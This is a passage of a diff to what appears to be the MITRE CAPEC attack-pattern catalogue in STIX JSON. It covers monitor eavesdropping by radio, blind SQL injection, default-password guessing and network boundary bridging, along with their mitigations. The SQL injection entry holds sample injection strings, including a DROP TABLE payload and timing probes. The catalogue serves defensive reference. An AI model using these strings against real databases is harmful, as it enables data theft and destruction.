"attack-pattern--260a8cb6-a7df-4dc5-a057-8a00aa69de7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "For web browsers, close sessions when finished to prevent malicious extensions/plugins from executing the the background.", + "id": "course-of-action--1084f0a9-9af8-4918-9e4a-e5e4f025bd78", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-698-5", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2022-09-29T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5730515f-d9bc-4ea4-96f5-1c85449fe63a", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1084f0a9-9af8-4918-9e4a-e5e4f025bd78", + "spec_version": "2.1", + "target_ref": "attack-pattern--260a8cb6-a7df-4dc5-a057-8a00aa69de7e", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An Adversary can eavesdrop on the content of an external monitor through the air without modifying any cable or installing software, just capturing this signal emitted by the cable or video port, with this the attacker will be able to impact the confidentiality of the data without being detected by traditional security tools", + "external_references": [ + { + "external_id": "CAPEC-699", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/699.html" + }, + { + "external_id": "CWE-1300", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/1300.html" + }, + { + "description": "TempestSDR: An SDR Tool For Eavesdropping on Computer Screens Via Unintentionally Radiated RF", + "external_id": "REF-744", + "source_name": "reference_from_CAPEC", + "url": "https://www.rtl-sdr.com/tempestsdr-a-sdr-tool-for-eavesdropping-on-computer-screens-via-unintentionally-radiated-rf/" + }, + { + "description": "Dan Maloney, Exposing Computer Monitor Side-Channel Vulnerabilities with TempestSDR", + "external_id": "REF-745", + "source_name": "reference_from_CAPEC", + "url": "https://hackaday.com/2020/07/15/exposing-computer-monitor-side-channel-vulnerabilities-with-tempestsdr/" + } + ], + "id": "attack-pattern--28cce7ad-5437-4fae-86b0-a21ab3a0e135", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Eavesdropping on a Monitor", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Meta", + "x_capec_child_of_refs": [ + "attack-pattern--94e596d2-6844-4031-80c3-8522642aaff8" + ], + "x_capec_consequences": { + "Confidentiality": [ + "Read Data" + ] + }, + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Survey Target: The adversary surveys the target location, looking for exposed display cables and locations to hide an SDR. This also includes looking for display cables or monitors placed close to a wall, where the SDR can be in range while behind the wall. The adversary also attempts to discover the resolution and refresh rate of the targeted display.

Experiment

  1. Find target using SDR: The adversary sets up an SDR near the target display cable or monitor. They use the SDR software to locate the corresponding frequency of the display cable. This is done by looking for interference peaks that change depending on what the screen is showing. The adversary notes down the possible frequencies of unintentional emission.

    2. Techniques
    An adversary can make use of many different commercially available SDR devices which are easy to setup such as a HackRF, Ubertooth, RTL-SDR, and many others.

Exploit

  1. Visualize Monitor Image: Once the SDR software has been used to identify the target, the adversary will record the transmissions and visualize the monitor image using these transmissions, which allows them to eavesdrop on the information visible on the monitor.

    2. Techniques
    The TempestSDR software can be used in conjunction an SDR device to visualize the monitor image. The adversary will specify the known monitor resolution and refresh rate, or if those are not known they can use the provided auto-correlation graphs to help predict these values. The adversary will then try the different frequencies recorded from the experiment phase, looking for a viewing monitor display. Low pass filters and gain can be manipulated to make the display image clearer.
", + "x_capec_extended_description": "\n This attack gives the adversary the ability to view an external monitor with an insignificant delay. There is also no indicator of compromise from the victim visible on the monitor.\n The eavesdrop is possible due to a signal leakage, that is produced at different points of the connection, including the source port, the connection between the cable and PC, the cable itself, and the connection between the cable and the monitor. That signal leakage can be captured near any of the leak points, but also in a near location, like the next room or a few meters away, using an SDR (Software-defined Radio) device and the correspondent software, that process and interpret the signal to show attackers what the monitor is displaying.\n From the victim’s point of view, this specified attack might cause a high risk, and from the other hand, from the attacker’s point of view, the attack is excellent, since the specified attack method can be used without investing too much effort or require too many skills, as long as the right attack tool is in right place, this allows attackers to completely compromise the confidentiality of the data; also giving the attacker the advantage of being undetectable by not only traditional security products but also from bug sweep because the SDR device is acting in passive mode.\n ", + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "Victim should use an external monitor device", + "Physical access to the target location and devices" + ], + "x_capec_resources_required": [ + "SDR device set with the correspondent antenna", + "Computer with SDR Software" + ], + "x_capec_skills_required": { + "Low": "Understanding of computing hardware, to identify the video cable and video ports", + "Medium": "Knowledge of how to use the SDR and related software: With this knowledge, the adversary will find the correct frequency where the signal is being leaked" + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Enhance: Increase the number of electromagnetic shield layers in the display ports and cables to contain or reduce the intensity of the leaked signal.", + "id": "course-of-action--6861ed58-d0bb-4b79-a234-6d3871f68301", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-699-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--f81ec05a-9f11-45a6-867c-62b54d1514de", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--6861ed58-d0bb-4b79-a234-6d3871f68301", + "spec_version": "2.1", + "target_ref": "attack-pattern--28cce7ad-5437-4fae-86b0-a21ab3a0e135", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement: Use a protocol that encrypts the video signal; in case the signal is intercepted the signal is protected by the encryption.", + "id": "course-of-action--afe1a16a-adf0-4319-8534-47f561dfe668", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-699-1", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--4096526b-50da-47c2-b008-add63b02b1e8", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--afe1a16a-adf0-4319-8534-47f561dfe668", + "spec_version": "2.1", + "target_ref": "attack-pattern--28cce7ad-5437-4fae-86b0-a21ab3a0e135", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Design: Lock away the video cables, making it difficult for the attacker to access the cables and place the antenna near them (If the distance condition between the antenna and display port/cable is not satisfied, the attack will not be possible).", + "id": "course-of-action--32e62a1f-c22b-463f-86b4-d5399aa93ac5", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-699-2", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--11be0074-5b6a-47ce-b412-6e814aaf3a56", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--32e62a1f-c22b-463f-86b4-d5399aa93ac5", + "spec_version": "2.1", + "target_ref": "attack-pattern--28cce7ad-5437-4fae-86b0-a21ab3a0e135", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Implement: Use wireless technologies to connect to external display devices.", + "id": "course-of-action--fd02f250-4a93-4e2e-8dc8-bd3e4abc9db8", + "modified": "2023-01-24T00:00:00.000Z", + "name": "coa-699-3", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5917544d-819a-4682-88b3-e6997f7efc51", + "modified": "2023-01-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--fd02f250-4a93-4e2e-8dc8-bd3e4abc9db8", + "spec_version": "2.1", + "target_ref": "attack-pattern--28cce7ad-5437-4fae-86b0-a21ab3a0e135", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Blind SQL Injection results from an insufficient mitigation for SQL Injection. Although suppressing database error messages are considered best practice, the suppression alone is not sufficient to prevent SQL Injection. Blind SQL Injection is a form of SQL Injection that overcomes the lack of error messages. Without the error messages that facilitate SQL Injection, the adversary constructs input strings that probe the target through simple Boolean SQL expressions. The adversary can determine if the syntax and structure of the injection was successful based on whether the query was executed or not. Applied iteratively, the adversary determines how and where the target is vulnerable to SQL Injection.", + "external_references": [ + { + "external_id": "CAPEC-7", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/7.html" + }, + { + "external_id": "CWE-89", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/89.html" + }, + { + "external_id": "CWE-209", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/209.html" + }, + { + "external_id": "CWE-74", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/74.html" + }, + { + "external_id": "CWE-20", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/20.html" + }, + { + "external_id": "CWE-697", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/697.html" + }, + { + "external_id": "CWE-707", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/707.html" + }, + { + "description": "Blind SQL Injection", + "source_name": "OWASP Attacks", + "url": "https://owasp.org/www-community/attacks/Blind_SQL_Injection" + } + ], + "id": "attack-pattern--9116da7f-a60e-4186-b42a-218f1b0eb269", + "modified": "2022-09-29T00:00:00.000Z", + "name": "Blind SQL Injection", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_child_of_refs": [ + "attack-pattern--42acc604-a86c-46f7-bd03-6e532c02d85e" + ], + "x_capec_consequences": { + "Availability": [ + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Confidentiality": [ + "Read Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ], + "Integrity": [ + "Modify Data", + "Execute Unauthorized Commands (Run Arbitrary Code)" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "\n An adversary may try entering something like \"username' AND 1=1; --\" in an input field. If the result is the same as when the adversary entered \"username\" in the field, then the adversary knows that the application is vulnerable to SQL Injection. The adversary can then ask yes/no questions from the database server to extract information from it. For example, the adversary can extract table names from a database using the following types of queries:\n \"username' AND ascii(lower(substring((SELECT TOP 1 name FROM sysobjects WHERE xtype='U'), 1, 1))) > 108\".\n If the above query executes properly, then the adversary knows that the first character in a table name in the database is a letter between m and z. If it doesn't, then the adversary knows that the character must be between a and l (assuming of course that table names only contain alphabetic characters). By performing a binary search on all character positions, the adversary can determine all table names in the database. Subsequently, the adversary may execute an actual attack and send something like:\n \"username'; DROP TABLE trades; --\n ", + "In the PHP application TimeSheet 1.1, an adversary can successfully retrieve username and password hashes from the database using Blind SQL Injection. If the adversary is aware of the local path structure, the adversary can also remotely execute arbitrary code and write the output of the injected queries to the local path. Blind SQL Injection is possible since the application does not properly sanitize the $_POST['username'] variable in the login.php file. See also: CVE-2006-4705" + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. [Hypothesize SQL queries in application]Generated hypotheses regarding the SQL queries in an application. For example, the adversary may hypothesize that their input is passed directly into a query that looks like:\n \"SELECT * FROM orders WHERE ordernum = _____\"or\"SELECT * FROM orders WHERE ordernum IN (_____)\"or\"SELECT * FROM orders WHERE ordernum in (_____) ORDER BY _____\"\n Of course, there are many other possibilities.\n

    2. Techniques
    Research types of SQL queries and determine which ones could be used at various places in an application.

  2. [Determine how to inject information into the queries]Determine how to inject information into the queries from the previous step such that the injection does not impact their logic. For example, the following are possible injections for those queries:\n \"5' OR 1=1; --\"and\"5) OR 1=1; --\"and\"ordernum DESC; --\"\n

    3. Techniques
    Add clauses to the SQL queries such that the query logic does not change.
    Add delays to the SQL queries in case server does not provide clear error messages (e.g. WAITFOR DELAY '0:0:10' in SQL Server or BENCHMARK(1000000000,MD5(1) in MySQL). If these can be injected into the queries, then the length of time that the server takes to respond reveals whether the query is injectable or not.

Experiment

  1. Determine user-controllable input susceptible to injection: Determine the user-controllable input susceptible to injection. For each user-controllable input that the adversary suspects is vulnerable to SQL injection, attempt to inject the values determined in the previous step. If an error does not occur, then the adversary knows that the SQL injection was successful.

    2. Techniques
    Use web browser to inject input through text fields or through HTTP GET parameters.
    Use a web application debugging tool such as Tamper Data, TamperIE, WebScarab,etc. to modify HTTP POST parameters, hidden fields, non-freeform fields, etc.
    Use network-level packet injection tools such as netcat to inject input
    Use modified client (modified by reverse engineering) to inject input.

  2. Determine database type: Determines the type of the database, such as MS SQL Server or Oracle or MySQL, using logical conditions as part of the injected queries

    3. Techniques
    Try injecting a string containing char(0x31)=char(0x31) (this evaluates to 1=1 in SQL Server only)
    Try injecting a string containing 0x313D31 (this evaluates to 1=1 in MySQL only)
    Inject other database-specific commands into input fields susceptible to SQL Injection. The adversary can determine the type of database that is running by checking whether the query executed successfully or not (i.e. whether the adversary received a normal response from the server or not).

Exploit

  1. Extract information about database schema: Extract information about database schema by getting the database to answer yes/no questions about the schema.

    2. Techniques
    Automatically extract database schema using a tool such as Absinthe.
    Manually perform the blind SQL Injection to extract desired information about the database schema.

  2. Exploit SQL Injection vulnerability: Use the information obtained in the previous steps to successfully inject the database in order to bypass checks or modify, add, retrieve or delete data from the database

    3. Techniques
    Use information about how to inject commands into SQL queries as well as information about the database schema to execute attacks such as dropping tables, inserting records, etc.
", + "x_capec_likelihood_of_attack": "High", + "x_capec_prerequisites": [ + "SQL queries used by the application to store, retrieve or modify data.", + "User-controllable input that is not properly validated by the application as part of SQL queries." + ], + "x_capec_resources_required": [ + "None: No specialized resources are required to execute this type of attack." + ], + "x_capec_skills_required": { + "Medium": "Determining the database type and version, as well as the right number and type of parameters to the query being injected in the absence of error messages requires greater skill than reverse-engineering database error messages." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Security by Obscurity is not a solution to preventing SQL Injection. Rather than suppress error messages and exceptions, the application must handle them gracefully, returning either a custom error page or redirecting the user to a default page, without revealing any information about the database or the application internals.", + "id": "course-of-action--b126246b-e773-4c81-af2f-40d1dcfb2160", + "modified": "2022-09-29T00:00:00.000Z", + "name": "coa-7-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--e8e7946c-f260-48f6-8601-b5bd6d149921", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--b126246b-e773-4c81-af2f-40d1dcfb2160", + "spec_version": "2.1", + "target_ref": "attack-pattern--9116da7f-a60e-4186-b42a-218f1b0eb269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--a8e9617f-1737-408d-9e05-97402a6101c9", + "modified": "2022-09-29T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--07cbed26-8c96-41e6-a239-7be587a38673", + "spec_version": "2.1", + "target_ref": "attack-pattern--9116da7f-a60e-4186-b42a-218f1b0eb269", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary may try certain common or default usernames and passwords to gain access into the system and perform unauthorized actions. An adversary may try an intelligent brute force using empty passwords, known vendor default credentials, as well as a dictionary of common usernames and passwords. Many vendor products come preconfigured with default (and thus well-known) usernames and passwords that should be deleted prior to usage in a production environment. It is a common mistake to forget to remove these default login credentials. Another problem is that users would pick very simple (common) passwords (e.g. \"secret\" or \"password\") that make it easier for the attacker to gain access to the system compared to using a brute force attack or even a dictionary attack using a full dictionary.", + "external_references": [ + { + "external_id": "CAPEC-70", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/70.html" + }, + { + "external_id": "CWE-521", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/521.html" + }, + { + "external_id": "CWE-262", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/262.html" + }, + { + "external_id": "CWE-263", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/263.html" + }, + { + "external_id": "CWE-798", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/798.html" + }, + { + "external_id": "CWE-654", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/654.html" + }, + { + "external_id": "CWE-308", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/308.html" + }, + { + "external_id": "CWE-309", + "source_name": "cwe", + "url": "http://cwe.mitre.org/data/definitions/309.html" + }, + { + "description": "Valid Accounts:Default Accounts", + "external_id": "T1078.001", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1078/001" + }, + { + "description": "Corporate IoT – a path to intrusion, 2019--10---05, Microsoft Security Response Center (MSRC)", + "external_id": "REF-572", + "source_name": "reference_from_CAPEC", + "url": "https://msrc-blog.microsoft.com/2019/08/05/corporate-iot-a-path-to-intrusion" + }, + { + "description": "Risks of Default Passwords on the Internet, 2016--10---07, Cybersecurity and Infrastructure Security Agency (CISA)", + "external_id": "REF-574", + "source_name": "reference_from_CAPEC", + "url": "https://www.us-cert.gov/ncas/alerts/TA13-175A" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-596", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/03-Identity_Management_Testing/04-Testing_for_Account_Enumeration_and_Guessable_User_Account.html" + }, + { + "description": "OWASP Web Security Testing Guide, The Open Web Application Security Project (OWASP)", + "external_id": "REF-597", + "source_name": "reference_from_CAPEC", + "url": "https://owasp.org/www-project-web-security-testing-guide/latest/4-Web_Application_Security_Testing/04-Authentication_Testing/02-Testing_for_Default_Credentials.html" + } + ], + "id": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "modified": "2021-06-24T00:00:00.000Z", + "name": "Try Common or Default Usernames and Passwords", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Detailed", + "x_capec_can_precede_refs": [ + "attack-pattern--03a731ef-751b-43de-9159-9667d4be4d1a", + "attack-pattern--22802ed6-ddc6-4da7-b6be-60b10d26198b", + "attack-pattern--886a7175-e28a-4e6d-bd22-3b1497e31dc7", + "attack-pattern--f2654def-b86d-4ddb-888f-de6b50a103a2", + "attack-pattern--2618d0a4-06d0-4bde-8271-2df61ed8297a" + ], + "x_capec_child_of_refs": [ + "attack-pattern--8d88a81c-bde9-4fb3-acbe-901c783d6427" + ], + "x_capec_consequences": { + "Access_Control": [ + "Gain Privileges" + ], + "Authorization": [ + "Gain Privileges" + ], + "Confidentiality": [ + "Gain Privileges" + ] + }, + "x_capec_domains": [ + "Software" + ], + "x_capec_example_instances": [ + "A user sets their password to \"123\" or intentionally leaves their password blank. If the system does not have password strength enforcement against a sound password policy, this password may be admitted. Passwords like these two examples are two simple and common passwords that are easily able to be guessed by the adversary.", + "Cisco 2700 Series Wireless Location Appliances (version 2.1.34.0 and earlier) have a default administrator username \"root\" with a password \"password\". This allows remote attackers to easily obtain administrative privileges. See also: CVE-2006-5288", + "In April 2019, adversaries attacked several popular IoT devices (a VOIP phone, an office printer, and a video decoder) across multiple customer locations. An investigation conducted by the Microsoft Security Resposne Center (MSRC) discovered that these devices were used to gain initial access to corporate networks. In two of the cases, the passwords for the devices were deployed without changing the default manufacturer’s passwords and in the third instance the latest security update had not been applied to the device. [REF-572]" + ], + "x_capec_likelihood_of_attack": "Medium", + "x_capec_prerequisites": [ + "The system uses one factor password based authentication.The adversary has the means to interact with the system." + ], + "x_capec_resources_required": [ + "Technology or vendor specific list of default usernames and passwords." + ], + "x_capec_skills_required": { + "Low": "An adversary just needs to gain access to common default usernames/passwords specific to the technologies used by the system. Additionally, a brute force attack leveraging common passwords can be easily realized if the user name is known." + }, + "x_capec_status": "Draft", + "x_capec_typical_severity": "High", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "Delete all default account credentials that may be put in by the product vendor.", + "id": "course-of-action--a5bb8adb-a8f3-466a-af09-898ca2b29b74", + "modified": "2021-06-24T00:00:00.000Z", + "name": "coa-70-0", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "course-of-action", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--5ae690da-8edd-49c2-92c4-8f09f6f23cd6", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--a5bb8adb-a8f3-466a-af09-898ca2b29b74", + "spec_version": "2.1", + "target_ref": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--ac1c094b-9c14-4717-9353-911a46460f08", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--1260aa3b-67cb-4194-9b7c-1edcd9cea382", + "spec_version": "2.1", + "target_ref": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--fcdf171c-f44d-4397-8365-c74fb76197ea", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--67382257-6794-48ac-82a0-f33260b6f0db", + "spec_version": "2.1", + "target_ref": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2014-06-23T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "id": "relationship--3139771b-b483-4f77-b9ab-79ab1c9eafbe", + "modified": "2021-06-24T00:00:00.000Z", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "relationship_type": "mitigates", + "source_ref": "course-of-action--bb36d937-986b-43eb-aa65-3e773af8ce32", + "spec_version": "2.1", + "target_ref": "attack-pattern--8c7bab16-5ecd-4778-9b04-c185bceed170", + "type": "relationship", + "x_capec_version": "3.9" + }, + { + "created": "2023-01-24T00:00:00.000Z", + "created_by_ref": "identity--e50ab59c-5c4f-4d40-bf6a-d58418d89bcd", + "description": "An adversary which has gained elevated access to network boundary devices may use these devices to create a channel to bridge trusted and untrusted networks. Boundary devices do not necessarily have to be on the network’s edge, but rather must serve to segment portions of the target network the adversary wishes to cross into.", + "external_references": [ + { + "external_id": "CAPEC-700", + "source_name": "capec", + "url": "https://capec.mitre.org/data/definitions/700.html" + }, + { + "description": "Network Boundary Bridging", + "external_id": "T1599", + "source_name": "ATTACK", + "url": "https://attack.mitre.org/wiki/Technique/T1599" + }, + { + "description": "CISA, Russian State-Sponsored Cyber Actors Targeting Network Infrastructure Devices, 2018--04---16", + "external_id": "REF-746", + "source_name": "reference_from_CAPEC", + "url": "https://www.cisa.gov/uscert/ncas/alerts/TA18-106A" + } + ], + "id": "attack-pattern--c93cedbb-0291-493a-bec9-9c9553697973", + "modified": "2023-01-24T00:00:00.000Z", + "name": "Network Boundary Bridging", + "object_marking_refs": [ + "marking-definition--17d82bb2-eeeb-4898-bda5-3ddbcd2b799d" + ], + "spec_version": "2.1", + "type": "attack-pattern", + "x_capec_abstraction": "Standard", + "x_capec_child_of_refs": [ + "attack-pattern--2a6131f7-30af-4529-be4e-bc3b7bf22009" + ], + "x_capec_consequences": { + "Access_Control": [ + "Read Data", + "Bypass Protection Mechanism" + ], + "Authorization": [ + "Alter Execution Logic", + "Hide Activities" + ], + "Confidentiality": [ + "Read Data", + "Bypass Protection Mechanism" + ], + "Integrity": [ + "Alter Execution Logic", + "Hide Activities" + ] + }, + "x_capec_domains": [ + "Communications", + "Software", + "Hardware" + ], + "x_capec_example_instances": [ + "\n In November 2016, a Smart Install Exploitation Tool was released online which takes advantage of Cisco’s unauthenticated SMI management protocol to download a target’s current configuration files. Adversaries can use this tool to overwrite files to modify the device configurations, or upload maliciously modified OS or firmware to enable persistence. Once the adversary has access to the device’s configurations, they could modify it to redirect network traffic through other network infrastructure.\n " + ], + "x_capec_execution_flow": "

Execution Flow

Explore

  1. Identify potential targets: An adversary identifies network boundary devices that can be compromised.

    2. Techniques
    The adversary traces network traffic to identify which devices the traffic flows through. Additionally, the adversary can identify devices using fingerprinting methods or locating the management page to determine identifying information about the device.

Experiment

  1. Compromise targets: The adversary must compromise the identified targets in the previous step.

    2. Techniques
    Once the device is identified, the adversary can attempt to input known default credentials for the device to gain access to the management console.
    Adversaries with sufficient identifying knowledge about the target device can exploit known vulnerabilities in network devices to obtain administrative access.

Exploit

  1. Bridge Networks: The adversary changes the configuration of the compromised network device to connect the networks the device was segmenting. Depending on the type of network boundary device and its capabilities, bridging can be implemented using various methods.

    2. Techniques
    The adversary can abuse Network Address Translation (NAT) in firewalls and routers to manipulate traffic flow to their own design. With control of the network device, the adversary can manipulate NAT by either using existing configurations or creating their own to allow two previously unconnected networks to communicate.
    Some network devices can be configured to become a proxy server. Adversaries can set up or exploit an existing proxy server on compromised network devices to create a bridge between separate networks.
